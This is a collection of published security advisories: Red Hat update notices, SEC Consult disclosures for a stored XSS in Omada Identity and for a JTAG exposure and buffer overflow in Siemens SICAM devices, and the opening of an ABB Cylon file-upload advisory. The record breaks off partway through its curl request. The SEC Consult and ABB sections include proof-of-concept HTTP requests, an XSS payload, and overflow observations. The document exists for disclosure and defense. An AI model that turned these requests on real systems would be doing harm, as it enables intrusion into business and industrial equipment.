Red Hat Security Advisory 2024-10705-03 - An update for the postgresql:12 module is now available for Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.6 Telecommunications Update Service. Issues addressed include a code execution vulnerability.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_10705.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: postgresql:12 security updateAdvisory ID:        RHSA-2024:10705-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:10705Issue date:         2024-12-03Revision:           03CVE Names:          CVE-2024-10979====================================================================Summary: An update for the postgresql:12 module is now available for Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.6 Telecommunications Update Service.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:PostgreSQL is an advanced object-relational database management system (DBMS).Security Fix(es):* postgresql: PostgreSQL PL/Perl environment variable changes execute arbitrary code (CVE-2024-10979)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-10979References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2326253

Red Hat Security Advisory 2024-10705-03

Red Hat Security Advisory 2024-10703-03 - An update for thunderbird is now available for Red Hat Enterprise Linux 9.0 Update Services for SAP Solutions. Issues addressed include bypass, cross site scripting, and spoofing vulnerabilities.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_10703.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: thunderbird security update  
Advisory ID:        RHSA-2024:10703-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:10703  
Issue date:         2024-12-03  
Revision:           03  
CVE Names:          CVE-2024-11159  
====================================================================

Summary: 

An update for thunderbird is now available for Red Hat Enterprise Linux 9.0 Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

Security Fix(es):

* thunderbird: Potential disclosure of plaintext in OpenPGP encrypted message (CVE-2024-11159)

* firefox: thunderbird: CSP Bypass and XSS Exposure via Web Compatibility Shims (CVE-2024-11694)

* firefox: thunderbird: Unhandled Exception in Add-on Signature Verification (CVE-2024-11696)

* firefox: thunderbird: Select list elements could be shown over another site (CVE-2024-11692)

* firefox: thunderbird: Memory safety bugs fixed in Firefox 133, Thunderbird 133, Firefox ESR 128.5, and Thunderbird 128.5 (CVE-2024-11699)

* firefox: thunderbird: URL Bar Spoofing via Manipulated Punycode and Whitespace Characters (CVE-2024-11695)

* firefox: thunderbird: Improper Keypress Handling in Executable File Confirmation Dialog (CVE-2024-11697)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-11159

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2325896  
https://bugzilla.redhat.com/show_bug.cgi?id=2328941  
https://bugzilla.redhat.com/show_bug.cgi?id=2328943  
https://bugzilla.redhat.com/show_bug.cgi?id=2328946  
https://bugzilla.redhat.com/show_bug.cgi?id=2328947  
https://bugzilla.redhat.com/show_bug.cgi?id=2328948  
https://bugzilla.redhat.com/show_bug.cgi?id=2328950

Red Hat Security Advisory 2024-10703-03

Red Hat Security Advisory 2024-10700-03 - Red Hat build of Apache Camel 4.8 for Spring Boot release and security update is now available. Issues addressed include privilege escalation and traversal vulnerabilities.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_10700.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: Red Hat Build of Apache Camel 4.8 for Spring Boot security update.Advisory ID:        RHSA-2024:10700-03Product:            Red Hat Build of Apache CamelAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:10700Issue date:         2024-12-02Revision:           03CVE Names:          CVE-2024-31141====================================================================Summary: Red Hat build of Apache Camel 4.8 for Spring Boot release and security update is now available.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat build of Apache Camel 4.8 for Spring Boot release and security update is now available.The purpose of this text-only errata is to inform you about the security issues fixed.Security Fix(es):* org.apache.kafka/kafka-clients: privilege escalation to filesystem read-access via automatic ConfigProvider (CVE-2024-31141)* org.springframework/spring-webmvc: Path traversal vulnerability in functional web frameworks (CVE-2024-38819)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-31141References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2327264https://bugzilla.redhat.com/show_bug.cgi?id=2327614

Red Hat Security Advisory 2024-10700-03

Red Hat Security Advisory 2024-10696-03 - An update for python-werkzeug is now available for Red Hat OpenStack Platform 16.2. Issues addressed include a remote shell upload vulnerability.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_10696.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: Red Hat OpenStack Platform 16.2 (python-werkzeug) security updateAdvisory ID:        RHSA-2024:10696-03Product:            Red Hat OpenStack PlatformAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:10696Issue date:         2024-12-02Revision:           03CVE Names:          CVE-2024-34069====================================================================Summary: An update for python-werkzeug is now available for Red Hat OpenStackPlatform 16.2 (Train).Red Hat Product Security has rated this update as having a security impactof Important. A Common Vulnerability Scoring System (CVSS) base score,which gives a detailed severity rating, is available for each vulnerabilityfrom the CVE link(s) in the References section.Description:Werkzeug is a WSGI utility module. It includes a debugger, request andresponse objects, HTTP utilities to handle entity tags, cache controlheaders, HTTP dates, cookie handling, file uploads, a URL routing systemand a numerous community contributed add-on modules. Werkzeug is unicodeaware and does not enforce a specific template engine, database adapter ora specific way of handling requests. It is useful for end userapplications, such as blogs, wikis, and bulletin boards, that need tooperate in a wide variety of server environments.Security Fix(es):* user may execute code on a developer's machine (CVE-2024-34069)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVEpage listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-34069References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2279451

Red Hat Security Advisory 2024-10696-03

Red Hat Security Advisory 2024-10517-03 - Red Hat OpenShift Container Platform release 4.17.7 is now available with updates to packages and images that fix several bugs.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_10517.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: OpenShift Container Platform 4.17.7 security and extras update  
Advisory ID:        RHSA-2024:10517-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:10517  
Issue date:         2024-12-03  
Revision:           03  
CVE Names:          CVE-2023-44270  
====================================================================

Summary: 

Red Hat OpenShift Container Platform release 4.17.7 is now available with updates to packages and images that fix several bugs.

This release includes a security update for Red Hat OpenShift Container Platform 4.17.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.17.7. See the following advisory for the container images for this release:

https://access.redhat.com/errata/RHSA-2024:10518

Security Fix(es):

* PostCSS: Improper input validation in PostCSS (CVE-2023-44270)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

All OpenShift Container Platform 4.17 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.17/updating/updating_a_cluster/updating-cluster-cli.html

Solution:

https://docs.openshift.com/container-platform/4.17/release_notes/ocp-4-17-release-notes.html

CVEs:

CVE-2023-44270

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2326998

Red Hat Security Advisory 2024-10517-03

Omada Identity versions prior to 15U1 and 14.14 hotfix #309 suffer from a persistent cross site scripting vulnerability.

SEC Consult Vulnerability Lab Security Advisory < 20241127-0 >  
=======================================================================  
              title: Stored Cross-Site Scripting  
            product: Omada Identity  
 vulnerable version: <v15U1, <v14.14 hotfix #309  
      fixed version: v15U1, v14.14 hotfix #309  
         CVE number: CVE-2024-52951  
             impact: Medium  
           homepage: https://omadaidentity.com/products/omada-identity/  
              found: 2024-03-20  
                 by: Daniel Hirschberger (Office Bochum)  
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult, an Eviden business  
                     Europe | Asia

                     https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"Omada Identity is a modern, enterprise-ready IGA solution that is deployed  
on-premises, giving you full control over your data and security. Our solution  
is easy to use, highly customizable, and gives you complete visibility into your  
environment without having to write a single line of code but is completely  
customizable to address any requirement. With built-in automation features,  
Omada Identity can help you streamline your workflows, improve efficiency, and  
strengthen your security posture."

Source: https://omadaidentity.com/products/omada-identity/

Business recommendation:  
------------------------  
Upgrade to version v15U1 or install hotfix #309 for v14.14.

SEC Consult highly recommends to perform a thorough security review of the  
product conducted by security professionals to identify and resolve potential  
further security issues.

Vulnerability overview/description:  
-----------------------------------  
1) Stored Cross-Site Scripting (CVE-2024-52951)  
An authenticated user can inject JavaScript in the "Request Reason". The  
injected JavaScript code will be executed if another user looks at the "History"  
of this access request. An attacker can then execute arbitrary JavaScript  
in the browser of other users which could for example be used for phishing attacks.

Proof of concept:  
-----------------  
1) Stored Cross-Site Scripting (CVE-2024-52951)  
An authenticated user can submit an access request and has to specify a reason why  
the access should be provided.

<1-1_request_access.png>

This request has to be intercepted and modified, e.g.:  
--------------------------------------------------------------------------------  
POST /workitemdlg.aspx?ACTTEMP=XXX&RURLID=YYY HTTP/1.1  
Host: $SERVER  
Cookie: oissessionid=$MYSESSION  
[...]  
Content-Type: application/x-www-form-urlencoded

[...]  
1000104=Need+hello+access+and+bigfun<iframe+src=javascript:alert(document.domain)></iframe>&1000102=I+would+like+to+request+access+to+%5Bspecify+system%5D+so+I+can+perform+my+%5Bspecify+duties%5D+duties+related+to+my+work+as+a+%5Bspecify+position%5D.  
[...]  
--------------------------------------------------------------------------------

Afterwards, anyone who reviews the "History" of this access request will be  
affected by the stored JavaScript code. Users who review the history requests are  
usually managers who have to approve this request, so this vulnerability allows  
reliably affecting higher-privileged users.

<1-2_trigger_xss.png>

Vulnerable / tested versions:  
-----------------------------  
The following version of the on-prem solution has been tested which was the latest  
version available at the time of the test:  
* 14.0.14.36

Previous versions of v14.14 hotfix #309 are affected according to the vendor, as  
well as <v15U1.

Vendor contact timeline:  
------------------------  
2024-04-08: Contacting vendor through contract@omadaidentity.com; no response.  
2024-04-24: Contacting vendor through contract@omadaidentity.com and  
            info@omadaidentity.com; no response.  
2024-05-06: Contacting vendor through their "Contact Us" form;  
            We were contacted by Sales and forwarded the email to them.  
2024-05-08: CISO contacts us, we sent the advisory via provided Sharepoint  
            link.  
2024-05-13: Vendor confirms security issues. XSS is fixed now and hotfixes  
            are created for their releases.  
            Second finding was disputed and seems to be a misconfiguration.  
            Removed issue 2 from advisory.  
2024-05-27: Asking for a status update regarding XSS hotfixes.  
2024-05-27: Vendor: May cloud update is scheduled for 29th May. On-prem  
            release version v15U1 is planned for 12th June. Hot-fix for on-prem  
            version 14.14 is also planned for 12th June.  
2024-06-17: Asking if Hotfix is released  
2024-06-21: Vendor: Hotfix #309 for v14.14 is released  
2024-06-24: Vendor: asks if we are satisfied with the follow-up  
            We agree and respect the wish to delay the publication of the  
            advisory for at least one month.  
2024-10-08: Asking vendor regarding CVE assignment.  
2024-10-11: Vendor is waiting for internal confirmation regarding next steps,  
            update hopefully next week.  
2024-10-08: Asking for a status update, whether we should assign a CVE.  
2024-10-31: Vendor responds with calculated CVSS vectors and asks for  
            our opinions;  
            We agree that the CVSS Base Score looks correct and ask to  
            clarify if they want to register the CVE themselves or if  
            we as a CNA should register it for them.  
2024-11-18: Received CVE number from vendor;  
            We provide our CVE details to the vendor and ask them  
            to update the CVE entry.  
2024-11-22: Vendor notifies us about the CVE update, gives us a  
            green light for the publication and thanks us for our  
            cooperation;  
            We mention that we will publish it in the following week  
            and also thank the vendor.  
2024-11-27: Release of security advisory.

Solution:  
---------  
Upgrade to version v15U1 or install hotfix #309 for v14.14.

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab  
An integrated part of SEC Consult, an Eviden business  
Europe | Asia

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Eviden business. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: https://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF Daniel Hirschberger / @2024

Omada Identity Cross Site Scripting

Various Siemens products suffer from vulnerabilities. There is an unlocked JTAG Interface for Zynq-7000 on SM-2558 and a buffer overflow on the webserver of the SM-2558, CP-2016, and CP-2019 systems.

SEC Consult Vulnerability Lab Security Advisory < 20241125-0 >  
=======================================================================  
              title: Unlocked JTAG interface and buffer overflow  
            product: Siemens SM-2558 Protocol Element (extension module for  
                     Siemens SICAM AK3/TM/BC),  
                     Siemens CP-2016 & CP-2019  
 vulnerable version: JTAG: Unknown HW revision, Zynq Firmware Version 10A45  
                     Buffer overflow: <V10.46 (ETA4), <V03.27 (ETA5),  
                     <V06.02 (CPCX26), <V06.05 (PCCX26)  
      fixed version: JTAG: SM-2558 hardware is EOL  
                     Buffer overflow: V06.02 (CPCX26), V10.46 (ETA4),  
                     V03.27 (ETA5), V06.05 (PCCX26)  
             impact: High  
           homepage: https://www.siemens.com  
              found: 2023-07-11  
                 by: Stefan Viehböck (Office Linz)  
                     Constantin Schieber-Knöbl (Office Vienna)  
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult, an Eviden business  
                     Europe | Asia

                     https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"We are a technology company focused on industry, infrastructure,  
transport, and healthcare. From more resource-efficient factories,  
resilient supply chains, and smarter buildings and grids, to cleaner  
and more comfortable transportation as well as advanced healthcare,  
we create technology with purpose adding real value for customers."

Source: https://new.siemens.com/global/en/company/about.html

Business recommendation:  
------------------------  
Upgrade to the latest firmware version to mitigate the buffer overflow.

The hardware (SM-2558) is considered end of life (EOL), thus no new  
version with a fixed JTAG will be released. Restrict physical access  
to the device.

SEC Consult highly recommends to perform a thorough security review of the  
product conducted by security professionals to identify and resolve potential  
further security issues.

Vulnerability overview/description:  
-----------------------------------  
1) Unlocked JTAG Interface of Zynq-7000 on SM-2558  
The JTAG interface can be accessed with physical access to the PCB.  
After slightly modifying the hardware it is possible to connect to  
the interface with full access to the communication module.

2) Buffer Overflow on the Webserver of the SM-2558, CP-2016 & CP-2019 (CVE-2024-31484)  
The webserver running on the SM-2558 device as well as CP-2016 and CP-2019  
is vulnerable to a buffer overflow vulnerability.

The value of the HTTP header "Session-ID" is processed and used in an  
"sprintf" call without proper length checking. The target buffer is in the  
BSS segment and likely 1024 bytes in length. The buffer overflows into several  
other global data structures.

Proof of concept:  
-----------------  
1) Unlocked JTAG Interface of Zynq-7000 on SM-2558  
The JTAG interface pins (TDI, TDO, TCK, TMS, GND) are accessible on a populated  
20-pin header on the PCB (see [figure_1]).

A removed connection needs to be restored by soldering an additional wire  
between two exposed contacts (see [figure_2]), as the JTAG interface of the  
Zynq-7000 is daisy-chained with the JTAG interface of the Broadcom BCM53101M  
Ethernet controller. The pad in question connects to pin A57 (TDI) of the Ethernet  
controller. After connecting to the pins, a connection to the Zynq-7000 JTAG  
interface is possible. E.g., memory can be dumped ([figure_5]), execution can be  
single stepped  ([figure_4]) or halted ([figure_3]), and variables changed.  
This grants an attacker with physical access full control of the communication  
module.

2) Buffer Overflow on the Webserver of the SM-2558, CP-2016 & CP-2019 (CVE-2024-31484)  
The vulnerability can be triggered with a HTTP POST request similar to the  
following one:

POST /SICAM_TOOLBOX_1703_remote_connection_01.htm HTTP/1.1  
User-Agent: SICAM TOOLBOX II  
Version: 1  
Session-ID: 3814280BA9922f30_BOF_PAYLOAD_HERE  
Sequence-ID: 525  
Content-Length: 54  
Content-Type: text/plain  
KeepAlive: 5  
Connection: close

type=1&length=15&data=0780640202fef1e60000feff0100c2

Here are a few observations with different Session-ID values:

a) Session ID value 3814280BA9922f30 results in normal behavior  
HTTP/1.1 200 OK  
Server: SICAM 1703  
Version: 1  
Session-ID: 3814280BA992fd0  
Sequence-ID: 1  
Content-Type: text/plain  
Content-Length: 8

type=4

b) Session ID value 3814280BA992fd00000000000000 results in normal behavior  
HTTP/1.1 200 OK  
Server: SICAM 1703  
Version: 1  
Session-ID: 3814280BA992fd00000000000000  
Sequence-ID: 1  
Content-Type: text/plain  
Content-Length: 0

c) Session ID value 3814280BA992fd00000000000000... (in total 618 characters) results in three HTTP responses  
HTTP/1.1 200 OK  
Server: SICAM 1703  
Version: 1  
Session-ID: 3814280BA992fd000000HTTP/1.1 200 OK  
Server: SICAM 1703  
Version: 1  
Session-ID: 3814280BA992fd000000HTTP/1.1 200 OK  
Server: SICAM 1703  
Version: 1  
Session-ID: 3814280BA992  
Sequence-ID: 1  
Content-Type: text/plain  
Content-Length: 8

type=4

d) Session ID value 3814280BA992fd00000000000000... (in total 1260 characters) results in a HTTP 500 - internal server error  
HTTP/1.1 500 Internal Server Error  
Content-Type: text/html  
Content-Length: 198

<html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>Sorry, an unexpected internal server error occurred while processing your request.</p></body></html>

Pseudocode of vulnerable function:  
[...]  
    sessiond_id = (char *)get_http_header(a1, (int)"Session-ID"); <<<<<<<<<<<<<<<< session_id is extracted from HTTP request  
    if ( !sessiond_id )  
      goto LABEL_194;  
    if ( unk_51CD1C )  
    {  
      v11 = 0;  
    }  
    else  
    {  
      sub_3DB0E4((unsigned int)byte_51CD08, (unsigned int)sessiond_id, 0x14u);  
      v11 = 1;  
    }  
    if ( sub_15332C() == 1 )  
    {  
      v134 = 0;  
      if ( sub_155BC4(a1, (int)v133) || !v134 )  
      {  
LABEL_49:  
        sequence_id = get_http_header_int(a1, "Sequence-ID");  
        sprintf(                      <<<<<<<<<<<<<<<< response_buffer overflows here  
          response_buffer,  
          "HTTP/1.1 200 OK\r\n"  
          "Server: %s\r\n"  
          "Version: %u\r\n"  
          "Session-ID: %s\r\n"  
          "Sequence-ID: %lu\r\n"  
          "Content-Type: text/plain\r\n"  
          "Content-Length: 0\r\n"  
          "\r\n",  
          "SICAM 1703",  
          1,  
          sessiond_id,  
          sequence_id);  
[...]

Vulnerable / tested versions:  
-----------------------------  
The following version has been tested which was the latest version available  
at the time of the test:  
- Webserver that runs on Firmware Version 10A45 of the Zynq FPGA.  
- The Hardware revision of the device was unknown.

According to the vendor, the following firmware versions for the SM-2558  
are affected by CVE-2024-31484:  
* ETA4 Ethernet Interface IEC60870-5-104: All versions < V10.46  
* ETA5 Ethernet Int. 1x100TX IEC61850 Ed.2: All versions < V03.27

Note that the same vulnerability exists as well in other products'  
firmware versions, namely:  
* CPCX26 Central Processing/Communication for CP-2016: All versions < V06.02  
* PCCX26 Ax 1703 PE, Contr, Communication Element for CP-2019: All versions < V06.05

Vendor contact timeline:  
------------------------  
2024-03-05: Contacting vendor through productcert@siemens.com  
2024-03-06: Siemens tracks this as #22436  
2024-04-03: Requested status update.  
2024-04-03: Siemens can reproduce vulnerabilities and will evaluate buffer overflow.  
            Hardware is EOL, no fix for the JTAG issue.  
2024-06-11: Siemens publishes SSA-620338 and confirms the buffer overflow.  
2024-07 - 2024-09: Various vacation / absences, delaying advisory coordination.  
2024-10-22: Meeting with ProductCERT, discussing release of SM-2558 advisory.  
2024-10-31: Sending advisory draft to ProductCERT.  
2024-11-14: Receiving feedback on advisory draft.  
2024-11-19: Sending updated advisory to ProductCERT.  
2024-11-25: Coordinated release of advisory.

Solution:  
---------  
The vendor provides patches for the affected devices / components  
to fix CVE-2024-31484:  
* ETA4 for SM-2558: Upgrade to V10.46  
* ETA5 for SM-2558: Upgrade to V03.27  
* CPCX26 for CP-2016: Upgrade to V06.02  
* PCCX26 for CP-2019: Upgrade to V06.05

More detailed information can be found in the Siemens Security Advisory SSA-620338:  
https://cert-portal.siemens.com/productcert/html/ssa-620338.html

The hardware (SM-2558) is considered end of life (EOL), thus no new version  
with a fixed JTAG will be released. Restrict physical access to the device.

Workaround:  
-----------  
Make sure to strictly limit physical access to the PLCs containing the protocol  
element during and also after its life cycle.

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab  
An integrated part of SEC Consult, an Eviden business  
Europe | Asia

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Eviden business. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: https://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF Constantin Schieber-Knöbl, Stefan Viehböck / @2024

Siemens Unlocked JTAG Interface / Buffer Overflow

ABB Cylon Aspect version 3.08.00 suffers from a vulnerability in the fileSystemUpdate.php endpoint of the ABB BEMS controller due to improper handling of uploaded files. The endpoint lacks restrictions on file size and type, allowing attackers to upload excessively large or malicious files. This flaw could be exploited to cause denial of service (DoS) attacks, memory leaks, or buffer overflows, potentially leading to system crashes or further compromise.

    ABB Cylon Aspect 3.08.00 (fileSystemUpdate.php) Insecure File UploadVendor: ABB Ltd.Product web page: https://www.global.abbAffected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio                  Firmware: <=3.08.00Summary: ASPECT is an award-winning scalable building energy managementand control solution designed to allow users seamless access to theirbuilding data through standard building protocols including smart devices.Desc: A vulnerability exists in the fileSystemUpdate.php endpoint of theABB BEMS controller due to improper handling of uploaded files. The endpointlacks restrictions on file size and type, allowing attackers to upload excessivelylarge or malicious files. This flaw could be exploited to cause Denial-of-Service(DoS) attacks, memory leaks, or buffer overflows, potentially leading to systemcrashes or further compromise.Tested on: GNU/Linux 3.15.10 (armv7l)           GNU/Linux 3.10.0 (x86_64)           GNU/Linux 2.6.32 (x86_64)           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz           PHP/7.3.11           PHP/5.6.30           PHP/5.4.16           PHP/4.4.8           PHP/5.3.3           AspectFT Automation Application Server           lighttpd/1.4.32           lighttpd/1.4.18           Apache/2.2.15 (CentOS)           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)Vulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2024-5866Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5866.php21.04.2024--$ cat project                 P   R   O   J   E   C   T                        .|                        | |                        |'|            ._____                ___    |  |            |.   |' .---"|        _    .-'   '-. |  |     .--'|  ||   | _|    |     .-'|  _.|  |    ||   '-__  |   |  |    ||      |     |' | |.    |    ||       | |   |  |    ||      | ____|  '-'     '    ""       '-'   '-.'    '`      |____░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░  ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░          ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░          ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░          ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ $ curl --path-as-is -X POST "http://192.168.73.31/fileSystemUpdate.php" \> -H "Content-Type: multipart/form-data; boundary=----J0X" \> -H "Accept-Encoding: gzip, deflate, br" \> -H "Cookie: PHPSESSID=xxx" \> -d "------J0X\> Content-Disposition: form-data; name=\"userfile\"; filename=\"test.aam\"\> Content-Type: application/octet-stream\> 